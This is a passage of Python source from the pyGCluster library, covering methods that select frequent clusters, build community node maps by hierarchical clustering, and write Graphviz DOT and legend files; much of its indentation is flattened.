legend_filename = hm_filename+'_legend.svg',
color_gradient = 'barplot'
)
self._print( '... clusterfreqs_expressionmap saved as: "{0}"'.format( hm_filename+'.svg' ), verbosity_level = 1 )
return
def _get_most_frequent_clusters(self, min_cluster_size = 4, top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01):
'''
Gets the most frequent clusters. Filters either according to a frequency-threshold or gets the top X clusters.
.. note ::
            Each cluster is attributed X counts, or frequencies, where X = len( Distance-linkage combinations ).
            For the determination of the most frequent clusters, only max( X frequencies ) matters.
Hence, a single frequency above threshold_4_the_lowest_max_freq is sufficient to include that cluster.
        :param min_cluster_size: only clusters whose size is greater than or equal to this threshold are considered, e.g. 4
:type min_cluster_size: int
:param threshold_4_the_lowest_max_freq: ]0, 1[ get all clusters with a max frequency above threshold, e.g. 0.01 => 1%-clusters
:type threshold_4_the_lowest_max_freq: float
:param top_X_clusters: get the top X clusters in the sorted list (by freq) of clusters having a maximum cluster frequency of at least threshold_4_the_lowest_max_freq.
:type top_X_clusters: int
:rtype: List of the most frequent clusters in ARBITRARY order.
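        Example (a sketch; "cluster" denotes a resampled pyGCluster.Cluster instance):
        >>> frequent_clusters = cluster._get_most_frequent_clusters( min_cluster_size = 4, top_X_clusters = 10 )
        ... # at most 10 clusters with >= 4 members, each reaching a maximum frequency of at least 1% (the default threshold)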
'''
import numpy
threshold_4_the_lowest_max_freq = float( threshold_4_the_lowest_max_freq )
topP_count = self[ 'Iterations' ] * threshold_4_the_lowest_max_freq
most_freq = []
max_counts = numpy.amax( self[ 'Cluster counts' ], axis = 1 ) # get max count for each cluster
if top_X_clusters is None:
mostfreqIDs = set( numpy.nonzero( max_counts >= topP_count )[ 0 ] )
for cluster, clusterID in self[ 'Cluster 2 clusterID' ].items():
if len( cluster ) >= min_cluster_size:
if clusterID in mostfreqIDs:
most_freq.append( cluster )
else: # top_X_clusters filter is requested:
            cID_mask = set( cID for c, cID in self[ 'Cluster 2 clusterID' ].items() if len( c ) < min_cluster_size )
            clusterIDs2retain = []
            for cID, above_threshold in enumerate( max_counts >= topP_count ):
                if above_threshold and cID not in cID_mask:
                    clusterIDs2retain.append( ( max_counts[ cID ], cID ) )
clusterIDs2retain.sort( reverse = True )
topX_clusterIDs = set( [ cID for count, cID in clusterIDs2retain[ : int(top_X_clusters) ] ] )
for cluster, clusterID in self[ 'Cluster 2 clusterID' ].items():
if clusterID in topX_clusterIDs:
most_freq.append(cluster)
        s = '{0} clusters are found for a threshold of {1} and a min cluster size of {2}.'
self._print( s.format( len( most_freq ), threshold_4_the_lowest_max_freq, min_cluster_size ), verbosity_level = 1 )
return most_freq
def plot_nodetree(self, tree_filename = 'tree.dot'):
'''
        Plot the dendrogram for the clustering of the most_frequent_clusters.
- node label = nodeID internally used for self['Nodemap'] (not the same as clusterID!).
- node border color is white if the node is a close2root-cluster (i.e. larger than self[ 'for IO skip clusters bigger than' ] ).
- edge label = distance between parent and children.
- edge - color codes:
- black = default; highlights child which is not a most_frequent_cluster but was created during formation of the dendrogram.
- green = children are connected with the root.
- red = highlights child which is a most_frequent_cluster.
- yellow = most_frequent_cluster is directly connected with the root.
:param tree_filename: name of the Graphviz DOT file containing the dendrogram of the AHC of most frequent clusters. Best given with ".dot"-extension!
:type tree_filename: string
:rtype: none
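        Example (a sketch; assumes :py:func:`pyGCluster.Cluster.build_nodemap` was called before):
        >>> cluster.plot_nodetree( tree_filename = 'tree.dot' )
        ... # writes 'tree.dot' and, if Graphviz' "dot" is available, renders 'tree.pdf'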
'''
with open( os.path.join( self[ 'Working directory' ], tree_filename ), 'w' ) as fout:
print( 'digraph "pyGCluster nodemap_of_the_clustering_of_most_freq_clusters" {', file = fout )
node2tag = {}
# draw nodes:
for tag, node in enumerate( self[ 'Nodemap - binary tree' ] ):
color = 'black'
try:
label = str( self[ 'Cluster 2 clusterID' ][ tuple( sorted( set( node ) ) ) ] )
except KeyError:
label = '-1'
label = 'size={0}, id={1}'.format( len( set( node ) ), label )
if self[ 'Root size' ] > len( set( node ) ) > self[ 'for IO skip clusters bigger than' ]:
color = 'white'
print( '"{0}" [label="{1}", color = "{2}"];'.format( tag, label, color ), file = fout )
node2tag[ node ] = tag
# insert connecting arrows:
for tag, parent in enumerate( self[ 'Nodemap - binary tree' ] ):
is_root_node = False
if len( set( parent ) ) == self[ 'Root size' ]:
is_root_node = True
for child in self[ 'Nodemap - binary tree' ][ parent ][ 'children' ]:
color = 'black'
if len( self[ 'Nodemap - binary tree' ][ child ][ 'children' ] ) == 0:
color = 'red'
if is_root_node:
if color == 'red':
color = 'yellow'
else:
color = 'green'
print( '"{0}" -> "{1}" [color="{2}"];'.format( tag, node2tag[ child ], color ), file = fout )
print( '}', file = fout )
# plot tree:
try:
input_file = '{0}'.format( os.path.join( self[ 'Working directory' ], tree_filename ) )
output_file = '{0}'.format( os.path.join( self[ 'Working directory' ], '{0}.pdf'.format( tree_filename[ :-4 ] ) ) )
subprocess.Popen( [ 'dot', '-Tpdf', input_file, '-o', output_file ] ).communicate()
except:
self._print( '[ INFO ] plotting via "dot -Tpdf ..." of the binary cluster-tree failed; only DOT file created.', verbosity_level = 1 )
return
def calculate_distance_matrix(self, clusters, min_overlap = 0.25):
'''
Calculates the specifically developed distance matrix for the AHC of clusters:
        (1) Clusters that do *not* share the minimum overlap are attributed a distance of "self[ 'Root size' ]" (i.e. len( self[ 'Data' ] ) ).
(2) Clusters are attributed a distance of "self[ 'Root size' ] - 1" to the root cluster.
(3) Clusters sharing the minimum overlap are attributed a distance of "size of the larger of the two clusters minus size of the overlap".
        The overlap between a pair of clusters is relative, i.e. defined as the size of the overlap divided by the size of the larger of the two clusters.
        The resulting condensed distance matrix is not returned, but rather stored in self[ 'Nodemap - condensed distance matrix' ].
:param clusters: the most frequent clusters whose "distance" is to be determined.
:type clusters: list of clusters. Clusters are represented as tuples consisting of their object's indices.
:param min_overlap: ]0, 1[ threshold value to determine if the distance between two clusters is calculated according to (1) or (3).
:type min_overlap: float
:rtype: none
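        Worked example (a sketch with hypothetical clusters, assuming self[ 'Root size' ] = 100 and min_overlap = 0.25):
        the clusters (1, 2, 3, 4) and (4, 5, 6, 7, 8, 9) share one object, so their relative overlap is 1/6 < 0.25 and their distance is 100, see (1);
        the clusters (1, 2, 3, 4) and (2, 3, 4, 5) share three objects, so their relative overlap is 3/4 >= 0.25 and their distance is 4 - 3 = 1, see (3).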
'''
self._print( 'calculating distance matrix for {0} clusters ...'.format( len( clusters ) ) , end = ' ', verbosity_level = 2 )
condensed_dist_matrix = []
a, b = 1, 1
clusters = [ set( c ) for c in clusters ]
for clusterI, clusterJ in itertools.combinations( clusters, 2 ):
if len( clusterI ) == self[ 'Root size' ] or len( clusterJ ) == self[ 'Root size' ]:
dist = a * self[ 'Root size' ] - b
else:
overlap = clusterI & clusterJ
n_overlap = float( len( overlap ) )
n_sizeI = float( len( clusterI ) )
n_sizeJ = float( len( clusterJ ) )
if n_sizeI > n_sizeJ:
max_size = n_sizeI
min_size = n_sizeJ
else:
max_size = n_sizeJ
min_size = n_sizeI
if float( n_overlap ) / float( max_size ) < min_overlap:
dist = a * self[ 'Root size' ]
else:
dist = a * max_size - b * n_overlap
condensed_dist_matrix.append( dist )
self[ 'Nodemap - condensed distance matrix' ] = condensed_dist_matrix
self._print( 'done.', verbosity_level = 2 )
return
def _get_levelX_clusters(self, level):
'''
Returns a list of all clusters that are present on a specific level in the node map.
Each level corresponds to an iteration in the community construction.
:param level: [0, max community-iterations] sets the level (or iteration) from which the clusters are to be returned.
:type level: int
:rtype: list
'''
cluster_list = []
for name in self[ 'Communities' ]:
cluster, current_level = name
if current_level == level:
cluster_list.append( cluster )
return sorted( cluster_list )
def build_nodemap(self, min_cluster_size = 4, top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01, starting_min_overlap = 0.1, increasing_min_overlap = 0.05):
'''
        Construction of communities from a set of most_frequent_clusters.
This set is obtained via :py:func:`pyGCluster.Cluster._get_most_frequent_clusters`, to which the first three parameters are passed.
These clusters are then subjected to AHC with complete linkage.
The distance matrix is calculated via :py:func:`pyGCluster.Cluster.calculate_distance_matrix`.
The combination of complete linkage and the distance matrix assures that all clusters in a community exhibit at least the "starting_min_overlap" to each other.
From the resulting cluster tree, a "first draft" of communities is obtained.
These "first" communities are then themselves considered as clusters, and subjected to AHC again, until the community assignment of clusters remains constant.
        In this way, clusters that initially did not overlap with every single cluster inside a target community are still inserted,
        provided they overlap with the union of the clusters already forming that community.
        This gradually relaxes the stringency: clusters fit into a community in a broader sense.
For further information on the community construction, see the publication of pyGCluster.
Internal structure of communities:
>>> name = ( cluster, level )
... # internal name of the community.
... # The first element in the tuple ("cluster") contains the indices
... # of the objects that comprise a community.
... # The second element gives the level,
... # or iteration when the community was formed.
>>> self[ 'Communities' ][ name ][ 'children' ]
... # list containing the clusters that build the community.
>>> self[ 'Communities' ][ name ][ '# of nodes merged into community' ]
... # the number of clusters that build the community.
>>> self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ]
... # an OrderedDict in which each index is assigned its obCoFreq.
... # Negative indices correspond to "placeholders",
... # which are required for the insertion of black lines into expression maps.
... # Black lines in expression maps separate the individual clusters
... # that form a community, sorted by when
... # they were inserted into the community.
>>> self[ 'Communities' ][ name ][ 'highest obCoFreq' ]
... # the highest obCoFreq encountered in a community.
>>> self[ 'Communities' ][ name ][ 'cluster ID' ]
... # the ID of the cluster containing the object with the highest obCoFreq.
Of the following parameters, the first three are passed to :py:func:`pyGCluster.Cluster._get_most_frequent_clusters`:
:param min_cluster_size: clusters smaller than this threshold are not considered for the community construction.
:type min_cluster_size: int
:param top_X_clusters: form communities from the top X clusters sorted by their maximum frequency.
:type top_X_clusters: int
:param threshold_4_the_lowest_max_freq: [0, 1[ form communities from clusters whose maximum frequency is at least this value.
:type threshold_4_the_lowest_max_freq: float
:param starting_min_overlap: ]0, 1[ minimum required relative overlap between clusters so that they are assigned the same community. The relative overlap is defined as the size of the overlap between two clusters, divided by the size of the larger cluster.
:type starting_min_overlap: float
:param increasing_min_overlap: defines the increase of the required overlap between communities
:type increasing_min_overlap: float
:rtype: none
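        Example (a minimal usage sketch; "cluster" denotes a resampled pyGCluster.Cluster instance):
        >>> cluster.build_nodemap( min_cluster_size = 4, threshold_4_the_lowest_max_freq = 0.01 )
        >>> max_level = max( [ name[ 1 ] for name in cluster[ 'Communities' ] ] )
        >>> cluster._get_levelX_clusters( level = max_level )
        ... # the final communities, one tuple of object indices per community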
'''
self[ 'Function parameters' ][ self.build_nodemap.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import scipy.spatial.distance as ssd
imported_from_scipy = False
try:
from fastcluster import linkage as ahc
except ImportError:
try:
from scipy.cluster.hierarchy import linkage as ahc
imported_from_scipy = True
            except ImportError:
                self._print( '[ ERROR ] You require either "fastcluster" or "scipy" for the construction of communities.', verbosity_level = 0 )
                return
# The algorithm is as follows:
# Starting from the top, all descendants of any cluster that is smaller than the root are determined.
# Those descendants form a community.
def communities_by_ahc(cluster_list, min_overlap):
# calculate distance matrix
self.calculate_distance_matrix( clusters = cluster_list, min_overlap = min_overlap )
# perform AHC
self._print( 'performing AHC for {0} clusters ...'.format( len( cluster_list ) ), end = ' ', verbosity_level = 2 )
# avoid scipy crash when only 2 objects are subjected to AHC:
if len( self[ 'Nodemap - condensed distance matrix' ] ) == 1 and len( cluster_list ) == 2:
self[ 'Nodemap - linkage matrix' ] = [ [ 0, 1, -99, len( set( cluster_list[ 0 ] + cluster_list[ 1 ] ) ) ] ]
else:
if imported_from_scipy:
self[ 'Nodemap - linkage matrix' ] = ahc( self[ 'Nodemap - condensed distance matrix' ], method = 'complete' )
else:
self[ 'Nodemap - linkage matrix' ] = ahc( self[ 'Nodemap - condensed distance matrix' ], method = 'complete', preserve_input = True )
self._print( 'done.', verbosity_level = 2 )
# parse clusters
self._print( 'parsing clusters ...', end = ' ', verbosity_level = 2 )
clusters = {} # required to reconstruct the clusters from the linkage matrix
nodemap = {} # each node = value is a dict with two keys: 'parent' -> parent cluster (as tuple), 'children' -> set of child clusters (tuples)
for i, cluster in enumerate( cluster_list ):
clusters[ i ] = cluster
nodemap[ cluster ] = { 'children' : [], 'parent' : None }
parentID = len( cluster_list ) - 1
for childID_1, childID_2, distance, size in self[ 'Nodemap - linkage matrix' ]:
parentID += 1
child1 = clusters[ childID_1 ]
child2 = clusters[ childID_2 ]
parent = child1 + child2
clusters[ parentID ] = parent
nodemap[ child1 ][ 'parent' ] = parent
nodemap[ child2 ][ 'parent' ] = parent
nodemap[ parent ] = { 'children' : [ child1, child2 ], 'parent' : None }
self[ 'Nodemap - binary tree' ] = nodemap
self._print( 'done.', verbosity_level = 2 )
# recursive function 2 find communities:
def get_communities( node , community_list = None ):
if community_list is None:
community_list = []
for child in nodemap[ node ][ 'children' ]:
if len( set( child ) ) == self[ 'Root size' ]:
community_list = get_communities( child, community_list = community_list )
else:
community_list.append( self._get_descendants_in_binary_tree( node = child ) + [ child ] )
return community_list
# get root_node = top node of the tree:
for node in nodemap:
if nodemap[ node ][ 'parent' ] is None:
root_node = node
break
community_list = get_communities( node = root_node, community_list = None )
clusters_combined_into_communities = []
for community in community_list:
endnodes = []
for cluster in community:
if cluster in cluster_list:
endnodes.append( cluster )
clusters_combined_into_communities.append( endnodes )
return clusters_combined_into_communities
def update_communities(level, clusters_combined_into_communities):
for community in clusters_combined_into_communities:
# find cluster with highest freq
community_obCoFreq2cluster_list = []
community_indices = set()
for cluster in community:
highest_obCoFreq = self[ 'Communities' ][ ( cluster, level ) ][ 'highest obCoFreq' ]
community_obCoFreq2cluster_list.append( ( highest_obCoFreq, cluster ) )
community_indices |= set( cluster )
community_obCoFreq2cluster_list.sort( reverse = True )
# print( level , 'level', community_indices)
first_cluster = community_obCoFreq2cluster_list[ 0 ][ 1 ]
name = ( tuple( sorted( community_indices ) ), level + 1 )
if name in self[ 'Communities' ]:
current_highest_obCoFreq = community_obCoFreq2cluster_list[ 0 ][ 0 ]
if current_highest_obCoFreq > self[ 'Communities' ][ name ][ 'highest obCoFreq' ]:
self[ 'Communities' ][ name ][ 'cluster ID' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ 'cluster ID' ]
community_obCoFreq2cluster_list.insert( 0, None ) # assure that the first cluster is also properly inserted
else:
# import copy
# print( self[ 'Communities' ][ ( first_cluster, level ) ][ 'index 2 obCoFreq dict' ] )
self[ 'Communities' ][ name ] = {}
self[ 'Communities' ][ name ][ 'children' ] = [ first_cluster ]
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ 'index 2 obCoFreq dict' ].copy()
self[ 'Communities' ][ name ][ 'cluster ID' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ 'cluster ID' ]
self[ 'Communities' ][ name ][ 'highest obCoFreq' ] = None
self[ 'Communities' ][ name ][ '# of nodes merged into community' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ '# of nodes merged into community' ]
self[ 'Communities' ][ name ][ '# of nodes merged into community' ] += len( community_obCoFreq2cluster_list ) - 1.
# insert children and update obCoFreq-Dict:
for _, cluster in community_obCoFreq2cluster_list[ 1 : ]:
self[ 'Communities' ][ name ][ 'children' ].append( cluster )
placeholder_added = False
for index in cluster:
obCoFreq = self[ 'Communities' ][ ( cluster, level ) ][ 'index 2 obCoFreq dict' ].get( index, 0. )
if index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ]:
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ] += obCoFreq
else:
if not placeholder_added:
placeholder = len( self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ] ) * -1
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ placeholder ] = -99
placeholder_added = True
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ] = obCoFreq
max_freq = max(
list(
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].values()
) + [0.0]
)
self[ 'Communities' ][ name ][ 'highest obCoFreq' ] = max_freq
return
def init_cluster2community0_level(min_cluster_size = None, top_X_clusters = None, threshold_4_the_lowest_max_freq = None):
most_frequent_clusters = self._get_most_frequent_clusters( min_cluster_size = min_cluster_size, top_X_clusters = top_X_clusters, threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq )
level = 0
maxIndex = 0
self[ 'Communities' ] = {}
for cluster in sorted( most_frequent_clusters ):
index2obCoFreq = OrderedDict()
cFreq, cFreqDict = self.frequencies( cluster = cluster )
for index in cluster:
index2obCoFreq[ index ] = cFreq
# if index > 146:
# print("<")
# exit(1)
max_freq = cFreq # max_freq = max( index2obCoFreq.values() ) = cFreq, because the indices are only from a single cluster at level 0
name = ( cluster, level )
self[ 'Communities' ][ name ] = {}
self[ 'Communities' ][ name ][ 'children' ] = []
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ] = index2obCoFreq
self[ 'Communities' ][ name ][ 'highest obCoFreq' ] = max_freq
self[ 'Communities' ][ name ][ 'cluster ID' ] = self[ 'Cluster 2 clusterID' ][ cluster ]
self[ 'Communities' ][ name ][ '# of nodes merged into community' ] = 1.
return
min_overlap = starting_min_overlap
init_cluster2community0_level(min_cluster_size = min_cluster_size, top_X_clusters = top_X_clusters, threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq)
level = 0
community_snapshot = None
while True:
cluster_list = self._get_levelX_clusters( level = level )
clusters_combined_into_communities = communities_by_ahc( cluster_list, min_overlap )
if community_snapshot == sorted( clusters_combined_into_communities ) or min_overlap >= 1.0:
break
self.plot_nodetree( 'AHCofClusters_binaryTree_iteration{0}.dot'.format(level) )
update_communities( level = level, clusters_combined_into_communities = clusters_combined_into_communities )
community_snapshot = sorted( clusters_combined_into_communities )
min_overlap += increasing_min_overlap
level += 1
return
def _get_descendants_in_binary_tree(self, node, children = None):
'''
Recursively determines the descendants of a given node in an AHC tree.
:param node: tuple describing uniquely a node in the AHC tree. It resembles a pyGCluster-cluster, but may contain the same index several times, e.g. if (1,2) and (1,3) are merged into (1,1,2,3).
:type node: tuple
:param children: all descendants determined so far. Should equal None for the first call.
:type children: list
:rtype: list
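        Sketch (hypothetical tree): if the leaves (1, 2) and (1, 3) were merged into a parent node ``parent``,
        >>> cluster._get_descendants_in_binary_tree( node = parent )
        ... # [ (1, 2), (1, 3) ]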
'''
if children is None:
children = []
if len( self[ 'Nodemap - binary tree' ][ node ][ 'children' ] ) > 0:
for child in self[ 'Nodemap - binary tree' ][ node ][ 'children' ]:
children.append( child )
self._get_descendants_in_binary_tree( node = child, children = children )
return children
def _get_descendants_in_community_tree(self, parent_name, children = None):
'''
Recursively determines the descendants of a given node in the community tree.
In contrast to :py:func:`pyGCluster.Cluster._get_descendants_in_binary_tree` , the community tree is not a binary tree;
and "parent_name" differs from the "node"-parameter of the former (see below).
:param parent_name: tuple with two elements: ( cluster, level ). Here, cluster is a pyGCluster-cluster, i.e. a tuple containing each index describing a cluster only once.
:type parent_name: tuple
:param children: all descendants determined so far. Should equal None for the first call.
:type children: list
:rtype: list
'''
if children is None:
children = []
if len( self[ 'Communities' ][ parent_name ][ 'children' ] ) > 0:
parent, level = parent_name
for child in self[ 'Communities' ][ parent_name ][ 'children' ]:
child_name = ( child, level - 1 )
children.append( child_name )
self._get_descendants_in_community_tree( parent_name = child_name, children = children )
return children
def create_rainbow_colors( self, n_colors = 10):
'''
Returns a list of rainbow colors. Colors are expressed as hexcodes of RGB values.
:param n_colors: number of rainbow colors.
:type n_colors: int
:rtype: list
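        Example:
        >>> cluster.create_rainbow_colors( n_colors = 3 )
        ... # [ '#FF0000', '#00FF00', '#0000FF' ]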
'''
import colorsys
colors = []
        for i in range( n_colors ):
            # hue has to be in [0.0, 1.0[
            hue = i / float( n_colors )
            rgb = [ int( value ) for value in colorsys.hsv_to_rgb( hue, 1, 255 ) ]
            hexcode = '#' + ''.join( '{0:02X}'.format( value ) for value in rgb )
            colors.append( hexcode )
return colors
def write_legend(self, filename = 'legend.txt'):
'''
Creates a legend for the community node map as a TXT file.
Herein, the object composition of each cluster of the node map as well as its frequencies are recorded.
Since this function is internally called by :py:func:`pyGCluster.Cluster.write_dot`, it is typically not necessary to call this function.
:param filename: name of the legend TXT file, best given with extension ".txt".
:type filename: string
:rtype: none
'''
with open( os.path.join( self[ 'Working directory' ] , filename ), 'w') as legend:
print( "Frequency order:\n{0}\n".format( ', '.join( sorted( self[ 'Distance-linkage combinations' ] ) ) ), file = legend )
for name in self[ 'Communities' ]:
cluster, level = name
if len( cluster ) > self[ 'for IO skip clusters bigger than' ]:
continue
if cluster in self[ 'Cluster 2 clusterID' ]:
cFreq, cFreqDict = self.frequencies( cluster = cluster )
else:
cFreqDict = { None : -99 }
nodeID = '{0}, {1}'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], level )
print( 'label = "{nodeID:0>3}", size = {size:0>3}, frequencies = {frequencies}'.format(
nodeID = nodeID,
size = len( cluster ),
frequencies = ', '.join( [ '{0:5.4f}'.format( f ) for method, f in sorted( cFreqDict.items() ) ] )
), file = legend
)
for index in cluster:
addOn = ''
try:
addOn = self[ 'Additional Labels' ][ self[ 'Identifiers' ][ index ] ]
                        if isinstance( addOn, ( list, set ) ):
                            addOn = ".oOo.".join( list( set( addOn ) ) )
except:
pass
print( '{0}\t{1}'.format( self[ 'Identifiers' ][ index ], addOn ), file = legend )
print( '+' * 50 , file = legend )
        self._print( '... legend saved in "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 2 )
return
def write_dot(self, filename , scaleByFreq = True, min_obcofreq_2_plot = None, n_legend_nodes = 5, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = '1337', box_style = 'classic'):
'''
Writes a Graphviz DOT file representing the cluster composition of communities.
Herein, each node represents a cluster. Its name is a combination of the cluster's ID, followed by the level / iteration it was inserted into the community:
- The node's size reflects the cluster's cFreq.
- The node's shape illustrates by which distance metric the cluster was found (if the shape is a point, this illustrates that this cluster was not among the most_frequent_clusters, but only formed during AHC of clusters).
- The node's color shows the community membership; except for clusters which are larger than self[ 'for IO skip clusters bigger than' ], those are highlighted in grey.
- The node connecting all clusters is the root (the cluster holding all objects), which is highlighted in white.
The DOT file may be rendered with "Graphviz" or further processed with other appropriate programs such as e.g. "Gephi".
If "Graphviz" is available, the DOT file is eventually rendered with "Graphviz"'s dot-algorithm.
        In addition, an expression map for each cluster of the node map is created (via :py:func:`pyGCluster.Cluster.draw_expression_map_for_community_cluster`).
Those are saved in the sub-folder "communityClusters".
This function also calls :py:func:`pyGCluster.Cluster.write_legend`,
which creates a TXT file containing the object composition of all clusters, as well as their frequencies.
:param filename: file name of the Graphviz DOT file representing the node map, best given with extension ".dot".
:type filename: string
:param scaleByFreq: switch to either scale nodes (= clusters) by cFreq or apply a constant size to each node (the latter may be useful to put emphasis on the nodes' shapes).
:type scaleByFreq: boolean
:param min_obcofreq_2_plot: if defined, clusters with lower cFreq than this value are skipped, i.e. not plotted.
:type min_obcofreq_2_plot: float
:param n_legend_nodes: number of nodes representing the legend for the node sizes. The node sizes themselves encode for the cFreq. "Legend nodes" are drawn as grey boxes.
:type n_legend_nodes: int
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0.
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map.
:type color_gradient: string
:param box_style: the way the relative standard deviation is visualized in the expression map. Currently supported are 'modern', 'fusion' or 'classic'.
:type box_style: string
:rtype: none
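        Example (a minimal usage sketch; assumes :py:func:`pyGCluster.Cluster.build_nodemap` was called before):
        >>> cluster.write_dot( filename = 'nodemap.dot', n_legend_nodes = 5 )
        ... # writes 'nodemap.dot' (plus 'nodemap.pdf' if Graphviz' "dot" is available),
        ... # the legend TXT file and the expression maps of the community clusters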
'''
self[ 'Function parameters' ][ self.write_dot.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import numpy
node_templateString = '"{nodeID}" [label="{label}", color="{color}", shape="{shape}", width="{freq}", height="{freq}", fixedsize=true, community={community}, c_members={c_members}, metrix="{metrix}", normalized_max_obCoFreq="{normalized_max_obCoFreq}"];'
node_templateString_dict = {}
edge_templateString = '"{parent}" -> "{child}" [color="{color}", arrowsize=2.0];'
edge_templateString_dict = {}
if 'Communities' not in self.keys():
self._print( 'function "build_nodemap()" was not called prior. Building node map with default settings ...', verbosity_level = 0 )
self.build_nodemap()
most_frequent_clusters_used_4_nodemap = set( self._get_levelX_clusters( level = 0 ) )
# assign each distance metric combo a specific shape (if possible):
metrix2shape = {}
n_metrices = len( self[ 'Distances' ] )
if len( self[ 'Distances' ] ) > 3:
self._print( '[ INFO ] more distance metrics than shapes! All shapes equal "ellipse".', verbosity_level = 1 )
shapes = [ 'ellipse' for i in range( n_metrices ** n_metrices ) ]
else:
shapes = [ 'box', 'ellipse', 'triangle', 'diamond', 'octagon', 'invtriangle', 'invtrapezium' ]
for i in range( 1, n_metrices + 1 ):
for metric_combo in itertools.combinations( self[ 'Distances' ] , i ):
metrix2shape[ ' + '.join( sorted( metric_combo ) ) ] = shapes.pop( 0 )
self._print( 'metric 2 shape:', metrix2shape , verbosity_level = 1 )
self[ 'nodemap metric2shape' ] = metrix2shape
# determine max obCoFreq for proper node scaling:
sorted_obCoFreqs = sorted( [ self[ 'Communities' ][ name ][ 'highest obCoFreq' ] for name in self[ 'Communities' ] ] )
max_obCoFreq = float( sorted_obCoFreqs[ -2 ] ) # sorted_obCoFreqs[ -1 ] == root, hence max_obCoFreq would always be cFreq(root) == 2.0!
# get top, i.e. largest cluster of each community:
max_level = max( [ name[1] for name in self[ 'Communities' ] ] )
communities_top_cluster = self._get_levelX_clusters( level = max_level )
# set colors:
communities_minus_close2root = [ c for c in communities_top_cluster if len( c ) < self[ 'for IO skip clusters bigger than' ] ]
community_colors = self.create_rainbow_colors( n_colors = len( communities_minus_close2root ) )
name2community_and_color = {}
for communityID, cluster in enumerate( communities_top_cluster ):
if cluster in communities_minus_close2root:
color = community_colors.pop( 0 )
else:
color = '#BEBEBE'
name = ( cluster, max_level )
communityID_color = ( communityID, color )
name2community_and_color[ name ] = communityID_color
for child_name in self._get_descendants_in_community_tree( parent_name = name ):
name2community_and_color[ child_name ] = communityID_color
# filter nodes by min_obcofreq_2_plot, and build 'name2nodeID'-dict:
name2nodeID = {}
skipped_nodes = set()
skipped_nodes.add( ( self[ 'Root' ], 0 ) )
for name in self[ 'Communities' ]:
name2nodeID[ name ] = len( name2nodeID )
            if min_obcofreq_2_plot is not None and min_obcofreq_2_plot > self[ 'Communities' ][ name ][ 'highest obCoFreq' ]:
community, level = name
if max_level > level: # prevent that communities are lost if community freq < min_obcofreq_2_plot
skipped_nodes.add( name )
### write dot file:
dot_filename = os.path.join( self[ 'Working directory' ], filename )
with open( dot_filename, 'w' ) as dot:
## initialize DOT file:
print( 'digraph "pyGCluster nodemap" {', file = dot )
print( 'graph [overlap=Prism, splines=true, ranksep=5.0, nodesep=0.75];', file = dot )
print( 'node [style=filled]', file = dot )
scale_factor = 5.
## draw nodes:
for level in range( max_level + 1 ):
for cluster in self._get_levelX_clusters( level ):
name = ( cluster, level )
if name in skipped_nodes:
continue
# draw expression map:
if len( cluster ) <= self[ 'for IO skip clusters bigger than' ]:
self.draw_expression_map_for_community_cluster( name, min_value_4_expression_map = min_value_4_expression_map, max_value_4_expression_map = max_value_4_expression_map, color_gradient = color_gradient , sub_folder = 'communityClusters', box_style = box_style )
node_templateString_dict[ 'nodeID' ] = name2nodeID[ name ]
# scale node size:
if scaleByFreq:
normalized_obCoFreq = self[ 'Communities' ][ name ][ 'highest obCoFreq' ]
width = normalized_obCoFreq / max_obCoFreq * scale_factor
else:
width = 2.5
node_templateString_dict[ 'freq' ] = width
node_templateString_dict[ 'label' ] = '{0}-{1}'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], level )
# determine shape:
if cluster in most_frequent_clusters_used_4_nodemap:
clusterID = self[ 'Cluster 2 clusterID' ][ cluster ]
distances = set()
for i in numpy.nonzero( self[ 'Cluster counts' ][ clusterID ] > 0 )[ 0 ]:
distance, linkage = self[ 'Distance-linkage combinations' ][ i ].split( '-' )
distances.add( distance )
distances = ' + '.join( sorted( distances ) )
node_templateString_dict[ 'metrix' ] = distances
node_templateString_dict[ 'shape' ] = metrix2shape[ distances ]
else:
node_templateString_dict[ 'metrix' ] = 'None'
node_templateString_dict[ 'shape' ] = 'point'
# store the cluster's size (in terms of objects describing it), set color and community ID:
node_templateString_dict[ 'c_members' ] = len( cluster )
communityID, community_color = name2community_and_color[ name ]
node_templateString_dict[ 'color' ] = community_color
node_templateString_dict[ 'community' ] = communityID
node_templateString_dict[ 'normalized_max_obCoFreq' ] = self[ 'Communities' ][ name ][ 'highest obCoFreq' ]
# finally insert node into dot-file:
print( node_templateString.format( **node_templateString_dict ), file = dot )
## insert edges:
for level in range( 1, max_level + 1 ):
for parent in self._get_levelX_clusters( level ):
parent_name = ( parent, level )
edge_templateString_dict[ 'parent' ] = name2nodeID[ parent_name ]
edge_templateString_dict[ 'color' ] = name2community_and_color[ parent_name ][ 1 ]
for child in self[ 'Communities' ][ parent_name ][ 'children' ]:
child_name = ( child, level - 1 )
if child_name in skipped_nodes:
continue
edge_templateString_dict[ 'child' ] = name2nodeID[ child_name ]
                        # tricky case: a child whose direct parent was skipped ...
if parent_name in skipped_nodes:
# find largest parent:
communityID, _ = name2community_and_color[ child_name ]
# get all community clusters which are attributed the current communityID:
community_names = set()
for name in name2community_and_color:
ID, _ = name2community_and_color[ name ]
